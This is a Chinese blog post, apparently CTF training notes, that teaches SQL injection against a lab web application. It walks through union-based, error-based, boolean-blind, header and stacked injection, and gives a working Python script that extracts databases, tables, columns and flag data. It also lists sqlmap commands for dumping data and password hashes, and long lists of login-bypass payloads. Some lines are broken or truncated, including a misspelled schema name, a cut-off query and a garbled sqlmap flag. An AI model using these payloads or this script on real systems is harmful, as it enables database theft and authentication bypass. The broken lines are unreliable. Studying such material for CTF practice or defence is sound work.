<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="SQL注入, Rmy4x&#39;s blog">
    <meta name="description" content="">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>SQL注入 | Rmy4x&#39;s blog</title>
    <link rel="icon" type="image/png" href="/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery.min.js"></script>

<meta name="generator" content="Hexo 6.3.0"><link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css">
<link rel="stylesheet" href="/css/prism-line-numbers.css" type="text/css"></head>




<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">Rmy4x&#39;s blog</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>分类</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">Rmy4x&#39;s blog</div>
        <div class="logo-desc">
            
            Never really desperate, only the lost of the soul.
            
        </div>
    </div>

    

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			分类
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        
        <li><div class="divider"></div></li>
        <li>
            <a href="https://github.com/blinkfox/hexo-theme-matery" class="waves-effect waves-light" target="_blank">
                <i class="fab fa-github-square fa-fw"></i>Fork Me
            </a>
        </li>
        
    </ul>
</div>


        </div>

        
            <style>
    .nav-transparent .github-corner {
        display: none !important;
    }

    .github-corner {
        position: absolute;
        z-index: 10;
        top: 0;
        right: 0;
        border: 0;
        transform: scale(1.1);
    }

    .github-corner svg {
        color: #0f9d58;
        fill: #fff;
        height: 64px;
        width: 64px;
    }

    .github-corner:hover .octo-arm {
        animation: a 0.56s ease-in-out;
    }

    .github-corner .octo-arm {
        animation: none;
    }

    @keyframes a {
        0%,
        to {
            transform: rotate(0);
        }
        20%,
        60% {
            transform: rotate(-25deg);
        }
        40%,
        80% {
            transform: rotate(10deg);
        }
    }
</style>

<a href="https://github.com/blinkfox/hexo-theme-matery" class="github-corner tooltipped hide-on-med-and-down" target="_blank"
   data-tooltip="Fork Me" data-position="left" data-delay="50">
    <svg viewBox="0 0 250 250" aria-hidden="true">
        <path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path>
        <path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2"
              fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path>
        <path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z"
              fill="currentColor" class="octo-body"></path>
    </svg>
</a>
        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/3.png')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">SQL注入</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        padding: 35px 0 15px 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        padding-bottom: 30px;
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/CTF/">
                                <span class="chip bg-color">CTF</span>
                            </a>
                        
                            <a href="/tags/SQL/">
                                <span class="chip bg-color">SQL</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                    <div class="post-cate">
                        <i class="fas fa-bookmark fa-fw icon-category"></i>
                        
                            <a href="/categories/CTF-SQL%E6%B3%A8%E5%85%A5/" class="post-category">
                                CTF SQL注入
                            </a>
                        
                    </div>
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2023-10-15
                </div>
                

                

                

                

                
            </div>
        </div>
        <hr class="clearfix">

        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <h1 id="SQL注入"><a href="#SQL注入" class="headerlink" title="SQL注入"></a>SQL注入</h1><p>数据库结构(前置知识)</p>
<p>​     <img src="https://amr7joxnxp.feishu.cn/space/api/box/stream/download/asynccode/?code=MzlhYjdlNzAxNTE5ZGFlOTk3NjAwZWExNmJkZDJkYTJfcVBRQUl3OFdBUVVUcGNxa3RCeWxCR2VsS3BGNktWY0FfVG9rZW46VThqb2JGUzQ3b1dtbWZ4RXVuNWNnQUs1blV4XzE2OTczNTYzNTg6MTY5NzM1OTk1OF9WNA" alt="img"></p>
<p><strong>由于关系型数据库系统具有明显的 库&#x2F;表&#x2F;列&#x2F;内容 的结构层次，所以通过SQL注入漏洞获取库中信息的时候，也是依据这样的顺序</strong></p>
<p>1、获取数据库名 </p>
<p>2、获取表名 </p>
<p>3、获取列名 </p>
<p>4、获取数据</p>
<p><strong>了解完了数据库的层次，大家可能还是有点蒙，下面直接进入正式的sql注入</strong></p>
<h2 id="SQL注入流程"><a href="#SQL注入流程" class="headerlink" title="SQL注入流程"></a>SQL注入流程</h2><h3 id="第一步：寻找注入点"><a href="#第一步：寻找注入点" class="headerlink" title="第一步：寻找注入点"></a>第一步：寻找注入点</h3><p>利用页面与数据库交互的地方，由于语句过滤的不严格，使得恶意语句带入到数据库中进行查询。</p>
<p>在页面中又诸如id&#x3D;1 id&#x3D;2等的位置就可以能有注入点。</p>
<hr>
<p> <strong>分析：</strong></p>
<p>先输入  ‘  ，如果页面回显出现异常，就说明输入的   <strong>‘</strong>  是有效果的，</p>
<p>‘的作用：判断注入类型是数字型还是字符型。例如：</p>
<p> 数字型：查询语句&#x3D;id ?id&#x3D;1</p>
<p> 字符型：查询语句&#x3D;‘id’ ?id&#x3D;’1’</p>
<p> 当我们语句注入时，对于字符型用’进行测试，例如带入单引号进去【id&#x3D;’1’’】，会把前面的语句进行闭合，组后会多一个’而导致页面报错；在数字型的时候输入一个单引号，在正常情况下也会报错，但报错的语句是不一样的，因为会告诉你id没有1’，</p>
<p>在题目中，在加上了’后?id&#x3D;1’页面没有特别的报错，也没有提示我们这  ‘  有问题，一般猜测来说就是查询不到1’的内容，所以判断是数字型。</p>
<hr>
<p> 到了上面那个位置还没判断出来是不是注入点，一般通过带入语句，例如and 1&#x3D;1</p>
<pre class="line-numbers language-Plain"><code class="language-Plain">http://172.16.1.116/index.php?id=1 and 1=1
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p> 如果页面正常，就说明接受了我们这个语句；</p>
<p>再带入and 1&#x3D;2</p>
<pre class="line-numbers language-Plain"><code class="language-Plain">http://172.16.1.116/index.php?id=1 and 1=2
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>显示异常。在判断id&#x3D;1的时候，用and将1&#x3D;2和id&#x3D;1并在一起执行的，</p>
<p>∵1&#x3D;2为假</p>
<p>∴导致了id&#x3D;1 and 1&#x3D;2为假，导致了页面回显异常。</p>
<p>综上所述，当?id&#x3D;1 and 1&#x3D;1时，页面回显正常；?id&#x3D;1 and 1&#x3D;2时，页面回显异常；从这里可以知道，这个页面可以接受我们传输的语句，说明这个位置就是一个<strong>注入点</strong>。我们就可以从这个位置传输我们的sql注入的恶意查询语句。</p>
<h3 id="第二步：开始注入！"><a href="#第二步：开始注入！" class="headerlink" title="第二步：开始注入！"></a>第二步：开始注入！</h3><p>在开始注入之前，你还要知道什么是联合查询</p>
<p><strong>什么是联合查询</strong></p>
<p>原本，id&#x3D;1时，会列出一个表格（查询的结果实际上是一个表格），当我们执行联合查询语句union select 1时，会生成第二个表，那么此时就生成了两个虚拟表，而两个虚拟表的列数需要一致。</p>
<hr>
<p>接下来，你就可以开始注入了。</p>
<p>sql注入就这？这么简单？  别急，这仅仅是一个开始</p>
<h4 id="整型注入"><a href="#整型注入" class="headerlink" title="整型注入"></a>整型注入</h4><h4 id="order-by"><a href="#order-by" class="headerlink" title="order by"></a>order by</h4><p> 由于两个虚拟表列数要一致，当不知道表的列数的时候，我们需要用order by这个语句来判断列数。</p>
<p>order by是以列数进行排序的，但当列数不存在时就会报错或者无回显。</p>
<p> 例如，当我们输入</p>
<pre class="line-numbers language-Plain"><code class="language-Plain">http://172.16.1.116/index.php?id=1 order by 10
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p> 此时的页面出现了错误，就说明这个页面没有10列；当我们继续输入order by 4时有正常显示、order by 5时无回显，说明存在4列。</p>
<p> 有了列数接下来就可以进行联合查询了。</p>
<h4 id="进行构造联合查询语句"><a href="#进行构造联合查询语句" class="headerlink" title="进行构造联合查询语句"></a>进行构造联合查询语句</h4><p> ?id&#x3D;1 union select 1,2,3,4相当于我们构造一个表格让它插入页面中。</p>
<p>做联合查询需要前表出错、后表执行。id&#x3D;1相当于前表1,2,3,4相当于后表，前表出错、后表执行就是要让id&#x3D;1的表报错即可，一下提供两种方法可以使id&#x3D;1报错</p>
<pre class="line-numbers language-Plain"><code class="language-Plain">id=1 and 1=2 union select 1,2,3,4
id=-1 union select 1,2,3,4
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<p>总结来看就是要让前表判断为假或者是不存在的表。</p>
<p>后表1,2,3,4执行后，相对应的数字就会显示在页面相对应的位置上。</p>
<p> 例如，要查数据库的版本：</p>
<pre class="line-numbers language-Plain"><code class="language-Plain">http://172.16.1.116/index.php?id=-1 union select 1,2,3,version()
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>只要在适当的数字上替换成相关的查询语句，查询的结果就会显示到页面上。（1,2,3,4的位置皆可放入语句，前提条件是方便预览、有回显）</p>
<h4 id="注入全过程语句展示"><a href="#注入全过程语句展示" class="headerlink" title="注入全过程语句展示"></a>注入全过程语句展示</h4><pre><code># 寻找注入点
http://172.16.1.116/index.php?id=1

# 判断虚拟表列数 
http://172.16.1.116/index.php?id=1 order by 1
http://172.16.1.116/index.php?id=1 order by 4
http://172.16.1.116/index.php?id=1 order by 5
# 确定列数为4

# 查看回显位置
http://172.16.1.116/index.php?id=-1 union select 1,2,3,4 #

# 查询数据库
http://129.168.1.1/?id=-1 union select 1,2,schema_name,4 from information_schema.schemata limit 0,1
http://129.168.1.1/?id=-1 union select 1,2,schema_name,4 from information_schema.schemata limit 1,2
……

# 查询指定数据库中的表
http://129.168.1.1/?id=-1 union select 1,2,table_name,4 from information_schema.tables where table_schema=&#39;数据库名&#39; limit 0,1

# 查询指定表中字段名
http://129.168.1.1/?id=-1 union select 1,2,column_name,4 from informtion_schema.columns where table_schema=&#39;数据库名&#39; and table_name=&#39;表名&#39; limit 0,1

# 倒出数据(查看数据库数据)
http://129.168.1.1/?id=-1 union select 1,2,字段名,4 from 数据库名.表名
</code></pre>
<p><strong>注意：</strong></p>
<p> <strong>1、为什么后面会用“limit”？limit表示范围，因为只会显示1行。</strong> </p>
<p><strong>2、如果要显示所有，可以用group_concat()函数【后面会写到】</strong> </p>
<p><strong>3、id&#x3D;-1是因为只有前表出错后表才能执行</strong></p>
<p><strong>group_concat函数</strong></p>
<pre class="line-numbers language-SQL"><code class="language-SQL"># 查询所有数据库
http://129.168.1.1/?id=-1 union select 1,2,group_concat(schema_name),4 from information_schema.schemata

# 查询指定数据库中的所有表
http://129.168.1.1/?id=-1 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema='数据库名'

# 查询指定表中所有字段名
http://129.168.1.1/?id=-1 union select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema='数据库名' and table_name='表名'

#查看数据库数据
http://129.168.1.1/?id=-1 union select 1,2,字段名,4 from 数据库名.表名
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>字符型注入需要在联合查询加英文状态下的单引号</p>
<pre><code>http://192.168.0.1/?id=-1 &#39; union select 1,2 --+
</code></pre>
<p>以此类推，注意：需要让语句闭合，正常执行，在url结尾输入%23 或者–+，正常闭合，%23为#，注释后面的语句,一定要注意“ ’ ”英文输入下，否则容易爆错</p>
<p>如果是在输入框就可以输入</p>
<pre><code>-1 &#39; union select 1,group_concat(schema_name) from information_schema.schemata # &#39;
</code></pre>
<h4 id="报错注入"><a href="#报错注入" class="headerlink" title="报错注入"></a>报错注入</h4><p><strong>死记硬背：</strong></p>
<pre><code>1 union select count(*),concat((查询语句),0x26,floor(rand(0)*2))x from information_schema.columns group by x
</code></pre>
<p>拆解分析↓</p>
<blockquote>
<p>1 count()：count()函数返回匹配指定条件的行数。count(*)函数返回表中的记录数</p>
<p>2 floor()：floor:函数是用来向下取整呢个的，相当于去掉小数部分</p>
<p>3 rand()：rand()是随机取（0，1）中的一个数，但是给它一个参数后0，即rand(0),并且传如floor()后，即：floor(rand(0)*2)它就不再是随机了，序列0110110</p>
<p>4 concat()：用于连接两个字符串</p>
<p>5 group by x:x就是相当于 as x,设一个别名</p>
<p>6 0x26：16进制数值，ASCII为“&amp;”，在回显中起到分隔作用</p>
</blockquote>
<p>例如：</p>
<p>获取当前数据库名</p>
<pre><code>1 union select count(*),concat((select database()),0x26,floor(rand(0)*2))x from information_schema.columns group by x;
</code></pre>
<p>获取所有数据库中的表名</p>
<pre><code>1 union select count(*),concat((select table_name from information_schema .tables where table.schema=&#39;DDD&#39;),0x26,flo
</code></pre>
<h4 id="cookie注入"><a href="#cookie注入" class="headerlink" title="cookie注入"></a>cookie注入</h4><p><img src="https://amr7joxnxp.feishu.cn/space/api/box/stream/download/asynccode/?code=ODNjY2YxYjVjZmJkMmQ1ZGUxNTM5ZWE3OTIyOGE4NWNfeWF4UWFneEFFQ2hoMmJuSXg4UVR5TThJWldsdzg2RHVfVG9rZW46QkxZQWJvZUFrb1E1UEZ4bFB2UGNUT1BIbjFjXzE2OTczNTU2MzY6MTY5NzM1OTIzNl9WNA" alt="img"></p>
<p><img src="https://amr7joxnxp.feishu.cn/space/api/box/stream/download/asynccode/?code=MTEwMjA5YmFjNjUyODIzNjNhNTZmNzQyODZiMTI1OWJfWXJQNk43dkcwNnNhU3doMzRnN09IclhaVGdDb3Rtd3BfVG9rZW46TWdVV2I4TXhjb0tBelB4dnd3S2NKdlBDbnNoXzE2OTczNTU2MzY6MTY5NzM1OTIzNl9WNA" alt="img"></p>
<h4 id="布尔盲注"><a href="#布尔盲注" class="headerlink" title="布尔盲注"></a>布尔盲注</h4><h5 id="（一）基本原理"><a href="#（一）基本原理" class="headerlink" title="（一）基本原理"></a>（一）基本原理</h5><p>在不知道数据库返回值的情况下对数据中的内容进行猜测，实施SQL注入</p>
<p>通俗点说，就是你在一间没有光线的屋子里打人，一巴掌打出去有没有打到的问题。</p>
<h5 id="（二）自动注入"><a href="#（二）自动注入" class="headerlink" title="（二）自动注入"></a>（二）自动注入</h5><p>直接使用sqlmap工具</p>
<h5 id="（三）手动注入-注入思路"><a href="#（三）手动注入-注入思路" class="headerlink" title="（三）手动注入&#x2F;注入思路"></a>（三）手动注入&#x2F;注入思路</h5><p>1、获取数据库名</p>
<pre><code>if(substr(database(),%d,1)=&quot;%s&quot;,1,(select table_name from information_schema.tables))
</code></pre>
<p>2、获取数据库中表名</p>
<pre><code>if(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)=&quot;%s&quot;,1,(select table_name from information_schema.tables))
</code></pre>
<p>​    </p>
<p>3、获取表中字段</p>
<pre><code>if(substr((select column_name from information_schema.columns where table_name=&quot;flag&quot;and table_schema= database() limit %d,1),%d,1)=&quot;%s&quot;,1,(select table_name from information_schema.tables))
</code></pre>
<p>​    </p>
<p>4、获取内容</p>
<pre><code>if(ascii(substr((select flag from flag),%d,1))=%d,1,(select table_name from information_schema.tables))
</code></pre>
<h5 id="PYTHON脚本"><a href="#PYTHON脚本" class="headerlink" title="PYTHON脚本"></a>PYTHON脚本</h5><pre class="line-numbers language-Python"><code class="language-Python">import requests
import time
 
 
urlOPEN = str(input("请输入网址【例：http://URL……/?id=】："))
starOperatorTime = []
mark = 'query_success'
def database_name():
    name = ''
    for j in range(1,9):
        for i in 'sqcwertyuioplkjhgfdazxvbnm':
            url = urlOPEN+'if(substr(database(),%d,1)="%s",1,(select table_name from information_schema.tables))' %(j,i)
            # print(url+'%23')
            r = requests.get(url)
            if mark in r.text:
                name = name+i
                
                print(name)
                
                break
    print('database_name:',name)
    
        
    
database_name()
def table_name():
    list = []
    for k in range(0,4):
        name=''
        for j in range(1,9):
            for i in 'sqcwertyuioplkjhgfdazxvbnm':
                url = urlOPEN+'if(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' %(k,j,i)
                # print(url+'%23')
                r = requests.get(url)
                if mark in r.text:
                    name = name+i
                    break
        list.append(name)
    print('table_name:',list)
 
 
#start = time.time()
table_name()
#stop = time.time()
#starOperatorTime.append(stop-start)
#print("所用的平均时间： " + str(sum(starOperatorTime)/100))
 
 
def column_name():
    list = []
    for k in range(0,3): #判断表里最多有4个字段
        name=''
        for j in range(1,9): #判断一个 字段名最多有9个字符组成
            for i in 'sqcwertyuioplkjhgfdazxvbnm':
                url=urlOPEN+'if(substr((select column_name from information_schema.columns where table_name="flag"and table_schema= database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' %(k,j,i)
                r=requests.get(url)
                if mark in r.text:
                    name=name+i
                    break
        list.append(name)
    print ('column_name:',list)
 
 
column_name()
 
 
def get_data():
        name=''
        for j in range(1,50): #判断一个值最多有51个字符组成
            for i in range(48,126):
                url=urlOPEN+'if(ascii(substr((select flag from flag),%d,1))=%d,1,(select table_name from information_schema.tables))' %(j,i)
                r=requests.get(url)
                if mark in r.text:
                    name=name+chr(i)
                    print(name)
                    break
        print ('value:',name)
    
get_data()
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h4 id="sqlmap"><a href="#sqlmap" class="headerlink" title="sqlmap"></a>sqlmap</h4><p><strong>sqlmap常用命令</strong></p>
<blockquote>
<p>-u → “URL”检测注入点 –dbs → 列出所有数据库的名字 –current-db → 列出当前数据库的名字 -D → 指定一个数据库 –tables → 列出表名 -T → 指定表名 –columns → 列出所有字段名 -C → 指定字段 –dump → 列出字段内容 –current-user → 当前用户 –current-db → 当前数据库 –is-dba → 是否是管理员 –hostname → 主机名 –users → 枚举用户 –passwords → 枚举用户密码哈希 –privilieges → 枚举用户权限</p>
</blockquote>
<p>sqlmap注入操作</p>
<p>以<a target="_blank" rel="noopener" href="http://172.16.1.116/%E4%B8%BA%E4%BE%8B">http://172.16.1.116/为例</a></p>
<p>按照注入流程↓</p>
<p>_1判断注入点</p>
<pre><code>sqlmap -u &quot;``http://172.16.1.116/?id=1``&quot; --batch
</code></pre>
<p>_2获取数据库名</p>
<pre><code>sqlmap -u &quot;``http://172.16.1.116/?id=1``&quot; --batch --dbs
</code></pre>
<p>_3获取指定数据库下所有表名</p>
<pre><code>sqlmap -u &quot;``http://172.16.1.116/?id=1``&quot; --batch -D 数据库名 --tables
</code></pre>
<p>_4获取表中字段名</p>
<pre><code>sqlmap -u &quot;``http://172.16.1.116/?id=1``&quot; --batch -D 数据库名 -T 表名 --column
</code></pre>
<p>_5获取数据</p>
<pre><code>sqlmap -u &quot;``http://172.16.1.116/?id=1``&quot; --batch -D 数据库名 -T 表名 -C 字段1,字段2…… --dmup
</code></pre>
<h4 id="UA注入"><a href="#UA注入" class="headerlink" title="UA注入"></a>UA注入</h4><p><strong>1、关于UA</strong></p>
<p>UA的全称是User-Agent</p>
<p>这个是在文件头中，需要使用Burp Suite Community Edition抓取</p>
<p><img src="https://amr7joxnxp.feishu.cn/space/api/box/stream/download/asynccode/?code=ZGViODk4MDJiZDRhYTc1YjUyNjcxMjNhNDZiNTM0NjhfZ08wVDBiMzE5aTZtaUtaSnNDZ1h4dUVabDRLRkhreTVfVG9rZW46UU01M2JObTl6bzJRd0t4Z0VOUWNQUGdyblJmXzE2OTczNTQyMDU6MTY5NzM1NzgwNV9WNA" alt="img"></p>
<p><strong>2、手工注入</strong></p>
<p>在User-Agent: 后面直接写语句就可以了，例如↓</p>
<pre><code>User-Agent:-1 union select group_concat(schema_name) from information_schema.schemata
</code></pre>
<h4 id="Refer注入"><a href="#Refer注入" class="headerlink" title="Refer注入"></a>Refer注入</h4><p>与UA注入基本一样，需要在Burp Suite Community Edition抓取报头，加上referer，例如↓</p>
<pre><code>Referer:-1 union select group_concat(schema_name) from information_schema.schemata
</code></pre>
<h4 id="堆叠注入"><a href="#堆叠注入" class="headerlink" title="堆叠注入"></a>堆叠注入</h4><blockquote>
<p> 在SQL中，用分号(;)表示一条sql语句的结束，堆叠注入呢就是在上一条语句结束后继续构造下一条语句。堆叠注入与联合查询最主要的区别就是 联合查询union或union all执行的语句类型是有限的，而堆叠注入可以执行任意的语句。然而 堆叠注入也是有局限性的 堆叠注入并不是每一个环境都可以执行的，可能受到API或者数据库引擎不支持的限制。下面就上实例吧</p>
</blockquote>
<p>原文链接：<a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_59571952/article/details/121621378">https://blog.csdn.net/weixin_59571952/article/details/121621378</a></p>
<p>在SQL中，分号（;）是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句，会不会一起执行？因此这个想法也就造就了堆叠注入。</p>
<p><a target="_blank" rel="noopener" href="https://www.shuzhiduo.com/A/gVdne9E75W/">https://www.shuzhiduo.com/A/gVdne9E75W/</a></p>
<h4 id="万能密码"><a href="#万能密码" class="headerlink" title="万能密码"></a>万能密码</h4><pre class="line-numbers language-HTTP"><code class="language-HTTP">' or 1='1
'or'='or'
admin
admin'--
admin' or 4=4--
admin' or '1'='1'--
admin888
"or "a"="a
admin' or 2=2#
a' having 1=1#
a' having 1=1--
admin' or '2'='2
')or('a'='a
or 4=4--
c
a'or' 4=4--
"or 4=4--
'or'a'='a
"or"="a'='a
'or''='
'or'='or'
1 or '1'='1'=1
1 or '1'='1' or 4=4
'OR 4=4%00
"or 4=4%00
'xor
admin' UNION Select 1,1,1 FROM admin Where ''='
1
-1%cf' union select 1,1,1 as password,1,1,1 %23
1
17..admin' or 'a'='a 密码随便
'or'='or'
'or 4=4/*
something
' OR '1'='1
1'or'1'='1
admin' OR 4=4/*
1'or'1'='1
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h4 id="asp-aspx万能密码"><a href="#asp-aspx万能密码" class="headerlink" title="asp aspx万能密码"></a>asp aspx万能密码</h4><pre class="line-numbers language-HTTP"><code class="language-HTTP">1：”or “a”=”a
2： ‘)or(‘a’=’a
3：or 1=1–
4：’or 1=1–
5：a’or’ 1=1–
6：”or 1=1–
7：’or’a’=’a
8：”or”=”a’=’a
9：’or”=’
10：’or’=’or’
11: 1 or ‘1’=’1’=1
12: 1 or ‘1’=’1’ or 1=1
13: ‘OR 1=1%00
14: “or 1=1%00
15: ‘xor
16: 用户名 ’ UNION Select 1,1,1 FROM admin Where ”=’ （替换表名admin）
密码 1
17…admin’ or ‘a’=’a 密码随便
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h4 id="PHP万能密码"><a href="#PHP万能密码" class="headerlink" title="PHP万能密码"></a>PHP万能密码</h4><pre class="line-numbers language-HTTP"><code class="language-HTTP">‘or 1=1/*
User: something
Pass: ’ OR ‘1’=’1
